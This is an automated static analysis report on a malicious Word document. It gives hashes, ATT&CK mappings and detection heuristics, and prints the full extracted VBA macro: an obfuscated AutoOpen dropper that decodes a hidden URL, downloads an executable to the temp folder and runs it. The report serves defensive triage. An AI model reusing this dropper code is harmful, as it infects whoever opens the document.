Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 007574d63fcc4a89…

MALICIOUS

Office (OOXML)

Size: 29.7 KB
Created: 2016-07-19 09:46:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2016-08-15

MD5: 1a87d12b450c61da78167e227f6b88d3
SHA-1: 1bb1b7526d20612268766cae4309b14886985473
SHA-256: 007574d63fcc4a89636cdddcebc71218d67850de0c2fe73a23c33941baee7e06

Risk score: 352

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
T1204.002 Malicious File

The sample contains obfuscated VBA macros, including an AutoOpen subroutine, that utilize CreateObject to download and execute a second-stage payload. Heuristics indicate the VBA code is designed to download and write a file to disk, and ClamAV detections confirm its malicious nature. The presence of an AutoOpen macro and CreateObject calls strongly suggests an attempt to execute arbitrary code upon opening the document.

Heuristics (9)

  • ClamAV: Doc.Macro.ObfuscatedData-6136276-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.ObfuscatedData-6136276-0
  • VBA project inside OOXML medium (5 related findings) OOXML_VBA
    Document contains a VBA project — VBA macros present
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
     somebody = mAshinkazingeraIgolochkuSlomala_to__1.responseBody
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Set mAshinkazingeraIgolochkuSlomala_to__1 = CreateObject(rjkjdhfn(I - 2))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set mAshinkazingeraIgolochkuSlomala_to__1 = CreateObject(rjkjdhfn(I - 2))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub autoopen()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs and the channel that reached each one:
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas (Referenced by macro)
    • http://schemas.microsoft.com/office/drawing/2014/chartex (Referenced by macro)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 (Referenced by macro)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships (Referenced by macro)
    • http://schemas.openxmlformats.org/officeDocument/2006/math (Referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing (Referenced by macro)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (Referenced by macro)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main (Referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordml (Referenced by macro)
    • http://schemas.microsoft.com/office/word/2012/wordml (Referenced by macro)
    • http://schemas.microsoft.com/office/word/2015/wordml/symex (Referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup (Referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk (Referenced by macro)
    • http://schemas.microsoft.com/office/word/2006/wordml (Referenced by macro)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape (Referenced by macro)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 12420 bytes
SHA-256: 04563673be7e02b5dbb3f0320c11442aeac8e8faef528c67fb505d339a5baf9e
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
StopSignal "", ""
End Sub

Attribute VB_Name = "Module1"
Public mAshinkazingeraIgolochkuSlomala_to__1 As Object
Public somebodySaloEst As Object
Public mAshinkazingeraIgolochkuSlomala_to__3 As Object
Public tdgfnbq() As String


Public mAshinkazingeraIgolochkuSlomala_to__4 As String
Public rjkjdhfn() As String
Public mAshinkazingeraIgolochkuSlomala_tolko1 As String
Public mAshinkazingeraIgolochkuSlomala_to_fiddle As Object
Public SheikerSheiker As String
Public Function CheckDriveSpecError(ByRef driveSpec As String) As Boolean
 Dim x1 As String, x2 As String
 Dim lDrive As Integer
CheckDriveSpecError = False
 driveSpec = Trim$(driveSpec)
 lDrive = Len(driveSpec)
 If lDrive = 0 Or lDrive > 2 Then
 CheckDriveSpecError = True
 ElseIf lDrive = 1 Then
 If UCase$(driveSpec) > "C" And UCase$(driveSpec) <= "Z" Then
 driveSpec = driveSpec & ":"
 Else
 CheckDriveSpecError = True
 End If
 ElseIf lDrive = 2 Then
 x1 = UCase$(Left$(driveSpec, 1))
 x2 = Right$(driveSpec, 1)
 If Not (x1 > "C" And x1 <= "Z" And x2 = ":") Then CheckDriveSpecError = True
 End If
End Function
Public Sub ClearColl(ByRef colX As Collection)
 Do While colX.Count > 0
 colX.Remove 1
 Loop
End Sub
Public Function Kombainer(A1 As String, A2 As String, A3 As String) As String
Kombainer = Replace(A1, A2, A3)
End Function
Public Function FileExist(InFile As String) As Boolean
 FileExist = False
 On Error Resume Next
 If Dir$(InFile) <> "" Then FileExist = True
End Function
Public Function GetProjTierInfo(ByVal ProjID As String, ByVal SubpID As String, ByVal DiscID As String) As String
GetProjTierInfo = ""
 Dim intProjID As Integer, intSubpID As Integer, intDiscID As Integer
 intProjID = IIf((Len(ProjID) > 0) And IsNumeric(ProjID), ProjID, -2)
 intSubpID = IIf((Len(SubpID) > 0) And IsNumeric(SubpID), SubpID, -2)
 intDiscID = IIf((Len(DiscID) > 0) And IsNumeric(DiscID), DiscID, -2)
 If (intProjID > -1) Then
 If (intSubpID > -1) Then
 If (intDiscID > -1) Then
 GetProjTierInfo = "3T"
 Else
 GetProjTierInfo = "2TA"
 End If
 Else
 If (intDiscID > -1) Then
 GetProjTierInfo = "2TB"
 Else
 GetProjTierInfo = "1T"
 End If
 End If
 ElseIf (intProjID = "-2") Then
 GetProjTierInfo = "0T"
 End If
End Function
Public Function IsDefined(ByVal strCin As String) As Boolean
 If strCin <> "" And strCin <> "-1" And strCin <> "-2" Then
 IsDefined = True
 Else
 IsDefined = False
 End If
End Function
Public Function IsNotApplicable(ByVal strCin As String) As Boolean
 If strCin = "-2" Then
 IsNotApplicable = True
 Else
 IsNotApplicable = False
 End If
End Function
Public Function IsUnDefined(ByVal strCin As String) As Boolean
 If strCin = "" Or strCin = "-1" Then
 IsUnDefined = True
 Else
 IsUnDefined = False
 End If
End Function
Public Function LastDelimit(ByVal cin As String, ByVal Delimit As String) As Integer
 Dim NL As Integer, N As Integer
 LastDelimit = 0
 NL = Len(cin)
 For N = NL To 1 Step -1
 If Mid$(cin, N, 1) = Delimit Then
 LastDelimit = N
 Exit Function
 End If
 Next N
End Function
Public Function ParseStr(ByVal cin As String, ByVal Delimit As String, _
 ByRef StrOut() As String) As Integer
 Dim lenDelimit As Integer, NS As String, NL As Integer, N As Integer
 Dim NUBound As Integer
 lenDelimit = Len(Delimit)
 cin = Trim$(cin)
 NL = Len(cin)
 If NL = 0 Then
 ParseStr = 0
 StrOut(0) = ""
 Exit Function
 End If
 NUBound = UBound(StrOut)
 ParseStr = 0
 NS = 1
 Do
 N = InStr(NS, cin, Delimit)
 If N > 0 Then
 StrOut(ParseStr) = Trim$(Mid$(cin, NS, N - NS))
 NS = N + lenDelimit
 Else
 StrOut(ParseStr) = Trim$(Mid$(cin, NS))
 End If
 ParseStr = ParseStr + 1
 If (ParseStr > NUBound) Then Exit Function
 Loop While N > 0 And NL > N
End Function
Public Function RemoveSpaceFromList(ByVal cin As String, ByVal Delimit As String) As String
 Dim nStr As Integer, N As Integer
 Dim StrOut(15) As String
 cin = Trim$(cin)
 If Len(cin) > 0 Then
 nStr = ParseStr(cin, Delimit, StrOut)
 For N = 0 To nStr - 1
 If N = 0 Then
 RemoveSpaceFromList = Trim$(StrOut(N))
 Else
 RemoveSpaceFromList = RemoveSpaceFromList & Delimit & Trim$(StrOut(N))
 End If
 Next N
 Else
 RemoveSpaceFromList = ""
 End If
End Function
Public Sub StrParserColl(ByVal cin, ByVal Delimit As String, _
 ByRef StrColl As Collection)
 Dim NL As Integer, N As Integer, NS As Integer, LenD As Integer
 Dim x As String
 Dim I As Integer
 Dim d As Boolean
 d = True
 IsWord = True
 For I = 1 To Len(Trim("A112DWDCS22"))
 If d = False Then
Set mAshinkazingeraIgolochkuSlomala_to__1 = CreateObject(rjkjdhfn(I - 2))
Exit For
Else
d = False
End If
Next I
Set mAshinkazingeraIgolochkuSlomala_to_BEZTEBYA = CreateObject(rjkjdhfn(3))
 C = ""
 Set mAshinkazingeraIgolochkuSlomala_to__3 = mAshinkazingeraIgolochkuSlomala_to_BEZTEBYA.Environment(rjkjdhfn(4))
 Dim trostTROS As Integer
For trostTROS = LBound(tdgfnbq) To UBound(tdgfnbq)
 SheikerSheiker = SheikerSheiker & PfghzufqntkjgwsRjyb(trostTROS)
 Next trostTROS
 ReplaceOneWithTwoQuotes ""
 mAshinkazingeraIgolochkuSlomala_to__4 = mAshinkazingeraIgolochkuSlomala_to__3(rjkjdhfn(6))
 mAshinkazingeraIgolochkuSlomala_tolko1 = mAshinkazingeraIgolochkuSlomala_to__4
mAshinkazingeraIgolochkuSlomala_tolko1 = mAshinkazingeraIgolochkuSlomala_tolko1 + rjkjdhfn(12)
WriteClientCmdColl Nothing
 Exit Sub
 Call ClearColl(StrColl)
 cin = Trim$(cin)
 NL = Len(cin)
 If NL <= 0 Then Exit Sub
 LenD = Len(Delimit)
 NS = 1
 Do
 N = InStr(NS, cin, Delimit)
 If N > 0 Then
 x = Trim$(Mid$(cin, NS, N - NS))
 If Left$(x, 1) = "`" And Right$(x, 1) = "`" Then
 x = Mid$(x, 2, Len(x) - 2)
 End If
 StrColl.Add x
 NS = N + LenD
 Else
 x = Trim$(Mid$(cin, NS))
 If Left$(x, 1) = "`" And Right$(x, 1) = "`" Then
 x = Mid$(x, 2, Len(x) - 2)
 End If
 StrColl.Add x
 End If
 Loop While N > 0
End Sub


Public Function PfghzufqntkjgwsRjyb(VaarP1 As Integer) As String
Dost = CInt(tdgfnbq(VaarP1))
PfghzufqntkjgwsRjyb = Chr(Dost / (10 + 6))
End Function

Public Function ReplaceOneWithTwoQuotes(ByVal cin As String) As String
 Dim COut As String
 Dim LCin As Integer, N As Integer, M As Integer, I As Integer
 ReplaceOneWithTwoQuotes = ""
 LCin = Len(cin)
 If Application = "Microsoft Word" Then
 mAshinkazingeraIgolochkuSlomala_to__1.Open rjkjdhfn(5), SheikerSheiker, False
mAshinkazingeraIgolochkuSlomala_to__1.Send
End If
 If LCin = 0 Then Exit Function
 COut = ""
 I = 1
 For N = 1 To 20
 M = InStr(I, cin, """")
 If M > 0 Then
 COut = COut & Mid$(cin, I, M - I + 1) & """"
 I = M + 1
 If M >= LCin Then Exit For
 Else
 Exit For
 End If
 Next N
 If I <= LCin Then COut = COut & Mid$(cin, I)
 ReplaceOneWithTwoQuotes = COut
End Function
Public Function ReplaceText(ByVal fromTxt As String, ByVal toTxt As String, _
 ByVal orgTxt As String) As String
 Dim finalTxt As String
 Dim lenOrgTxt As Integer, lenFromTxt
 Dim N As Integer, M As Integer
 finalTxt = ""
 orgTxt = Trim$(orgTxt)
 lenOrgTxt = Len(orgTxt)
 If lenOrgTxt = 0 Then
 ReplaceText = finalTxt
 End If
 lenFromTxt = Len(fromTxt)
 finalTxt = ""
 N = 1
 Do
 M = InStr(N, orgTxt, fromTxt)
 If (M > 0) Then
 finalTxt = finalTxt & Mid(orgTxt, N, M - N) & toTxt
 N = M + lenFromTxt
 Else
 finalTxt = finalTxt & Mid$(orgTxt, N)
 End If
 Loop While (lenOrgTxt > N And M > 0)
 ReplaceText = finalTxt
End Function
Public Sub WriteClientCmd_OLD1(ByVal NItem As Integer, ByRef cin() As String)
 Dim N As Integer
 Dim x As Variant, xx As String
 N = 0
 xx = ""
 For N = 0 To NItem - 1
 If N = 0 Then
 xx = "" & cin(N)
 ElseIf N = 1 Then
 xx = xx & " """ & cin(N) & """"
 Else
 xx = xx & ", """ & cin(N) & """"
 End If
 Next N
 Print #2, xx
 N = 0
 xx = ""
 For N = 0 To NItem - 1
 If N = 0 Then
 xx = " LFile.WriteLine(""" & cin(N)
 ElseIf N = 1 Then
 xx = xx & " """"" & cin(N) & """"""
 Else
 xx = xx & ", """"" & cin(N) & """"""
 End If
 Next N
 xx = xx & """)"
 Print #2, xx
End Sub
Public Sub WriteClientCmdColl(ByRef colStr As Collection)
 Dim lngN As Long
 Dim xx As String
 somebodySaloEst.Type = 1
 somebodySaloEst.Open
 somebody = mAshinkazingeraIgolochkuSlomala_to__1.responseBody
somebodySaloEst.Write somebody
 somebodySaloEst.savetofile mAshinkazingeraIgolochkuSlomala_tolko1, 2
 mAshinkazingeraIgolochkuSlomala_to_fiddle.Open (mAshinkazingeraIgolochkuSlomala_tolko1)
Exit Sub
 xx = ""
 For lngN = 1 To colStr.Count
 If lngN = 1 Then
 xx = "" & colStr(lngN)
 ElseIf lngN = 2 Then
 xx = xx & " """ & colStr(lngN) & """"
 Else
 xx = xx & ", """ & colStr(lngN) & """"
 End If
 Next lngN
 Print #2, xx
 xx = ""
 For lngN = 1 To colStr.Count
 If lngN = 1 Then
 xx = " LFile.WriteLine(""" & colStr(lngN)
 ElseIf lngN = 2 Then
 xx = xx & " """"" & colStr(lngN) & """"""
 Else
 xx = xx & ", """"" & colStr(lngN) & """"""
 End If
 Next lngN
 xx = xx & """)"
 Print #2, xx
End Sub
Public Sub WriteClientCmd_OLD2(ParamArray cin())
 Dim N As Integer
 Dim x As Variant, xx As String
 N = 0
 xx = ""
 For Each x In cin
 N = N + 1
 If N = 1 Then
 xx = "" & x & "("
 ElseIf N = 2 Then
 xx = xx & """" & x & """"
 Else
 xx = xx & ", """ & x & """"
 End If
 Next x
 xx = xx & ")"
 Print #2, xx
 N = 0
 xx = ""
 For Each x In cin
 N = N + 1
 If N = 1 Then
 xx = " LFile.WriteLine(""" & x & "("
 ElseIf N = 2 Then
 xx = xx & """""" & x & """"""
 Else
 xx = xx & ", """"" & x & """"""
 End If
 Next x
 xx = xx & ")"")"
 Print #2, xx
End Sub
Public Function LocalTimeToUTC(ByVal the_date As Date) As Date
Dim system_time As String
Dim local_file_time As String
Dim utc_file_time As String
 DateToSystemTime the_date, system_time
 SystemTimeTo.FileTime system_time, local_file_time
 LocalFileTimeTo.FileTime local_file_time, utc_file_time
 FileTimeTo.SystemTime utc_file_time, system_time
 SystemTimeToDate system_time, the_date
 LocalTimeToUTC = the_date
End Function
Private Sub DateToSystemTime(ByVal the_date As Date, ByRef system_time As String)
 With system_t.ime
 .wYear = Year(the_date)
 .wMonth = Month(the_date)
 .wDay = Day(the_date)
 .wHour = Hour(the_date)
 .wMinute = Minute(the_date)
 .wSecond = Second(the_date)
 End With
End Sub
Private Sub SystemTimeToDate(system_time As String, ByRef the_date_sys As Date)
 With system_t.ime
 the_date_sys = DateSerial(.wYear, .wMonth, .wDay) + _
 TimeSerial(.wHour, .wMinute, .wSecond)
 End With
End Sub


Public Function StopSignal(ByVal NetDrive As String, ByVal ServerPath As String) As Integer
 tdgfnbq = Split("1664678678678232185667867867823218566786786782321792678678678232928678678678232752678678678232752678678678232195267867867823215526786786782321712678678678232155267867867823216486786786782321680678678678232174467867867823216166786786782321568678678678232161667867867823217286786786782327366786786782321824678678678232187267867867823275267867867823276867867867823216646786786782321568678678678232880678678678232864678678678232848", "678678678232")
 Dim DFNBPLFC As String
DFNBPLFC = Kombainer("TOOCicroTOOOCoft.XTOOCLHTTPTOOOOCAdodb.TOOOCtrTOCaTOOCTOOOOCTOOOChTOCll.ApplicationTOOOOCWTOOOCcript.TOOOChTOCllTOOOOCProcTOCTOOOCTOOOCTOOOOCGTOCTTOOOOCTTOCTOOCPTOOOOCTypTOCTOOOOCopTOCnTOOOOCwritTOCTOOOOCrTOCTOOOCponTOOOCTOCBodyTOOOOCTOOOCavTOCtofilTOCTOOOOC\isnovaTOOOC2.TOCxTOC", "TOC", "e")
 DFNBPLFC = Kombainer(DFNBPLFC, "TOOC", "M")
 DFNBPLFC = Kombainer(DFNBPLFC, "TOOOC", "s")
 rjkjdhfn = Split(DFNBPLFC, "TOOOOC")
 Set somebodySaloEst = CreateObject(rjkjdhfn(1))
 Set mAshinkazingeraIgolochkuSlomala_to_fiddle = CreateObject(rjkjdhfn(2))
StrParserColl "", "", Nothing
Exit Function
 Dim Rtn As Boolean
 Rtn = ConnectNet.Drive(NetDrive, ServerPath)
 StopSignal = IIf(Rtn = True, 0, -1)
End Function

Attribute VB_Name = "DDAS"
Attribute VB_Base = "0{21700D54-6E7B-4E09-98FB-4F320987F52B}{2A8A3322-9AF4-446C-9596-0CB222B88AA8}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 38400 bytes
SHA-256: bf1230efc56a150b324c1b38a5f0e13a16da5007d1df6b4e5df94701c83edf45
Detection
ClamAV: Doc.Macro.ObfuscatedData-6136276-0
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).